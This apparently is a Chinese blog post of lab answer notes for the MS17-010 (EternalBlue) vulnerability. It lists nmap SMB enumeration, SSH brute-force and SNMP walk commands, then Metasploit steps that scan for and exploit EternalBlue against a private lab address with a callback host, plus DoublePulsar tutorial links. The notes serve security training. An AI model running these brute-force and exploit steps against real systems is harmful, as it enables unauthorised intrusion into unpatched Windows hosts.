-->

whaust

2020年3月14日 星期六

MS17-010 解答



nmap --script smb-enum-shares.nse -p 445 172.20.20.11
Exploiting ssh using metasploit
https://www.youtube.com/watch?v=uRvfx7PVcwU

https://resources.infosecinstitute.com/snmp-pentesting/#gref
nmap -p 22 --script ssh-brute --script-args userdb=users.lst,passdb=pass.lst \
  --script-args ssh-brute.timeout=4s -d
snmpwalk -c public 172.20.20.11 -v1

https://www.hackingarticles.in/netbios-and-smb-penetration-testing-on-windows/
 
use auxiliary/scanner/smb/smb_ms17_010
msf auxiliary(smb_ms17_010) > set rhosts 172.20.20.11
msf auxiliary(smb_ms17_010) > set port 445
msf auxiliary(smb_ms17_010) > exploit

use exploit/windows/smb/ms17_010_eternalblue
msf exploit(ms17_010_eternalblue) >set rhost 172.20.20.11
msf exploit(ms17_010_eternalblue) >set rport 445
msf exploit(ms17_010_eternalblue) >set lhost 192.168.168.7
msf exploit(ms17_010_eternalblue) > exploit


https://laucyun.com/a6cb3c752b0fc10f0a9eeef01f7a5f76.html
把eternalblue_doublepulsar.rb复制到/usr/share/metasploit-framework/modules/exploits/windows/smb


windows 7 | How to use EternalBlue & DoublePulsar Metasploit in Kali Linux 2017
https://www.youtube.com/watch?v=ptfcx8J3eyk

Troubleshooting
https://blog.csdn.net/userpass_word/article/details/85124266


NSA Hacking Tool EternalBlue – DoublePulsar | Hack Windows without any backdoor | Freaking Awesome Hacking Tool | Extreme Hack
https://blackhatinside.wordpress.com/2017/07/28/nsa-hacking-tool-eternalblue-doublepulsar-hack-windows-without-any-backdoor-freaking-awesome-hacking-tool-extreme-hack/

沒有留言:

張貼留言

Popular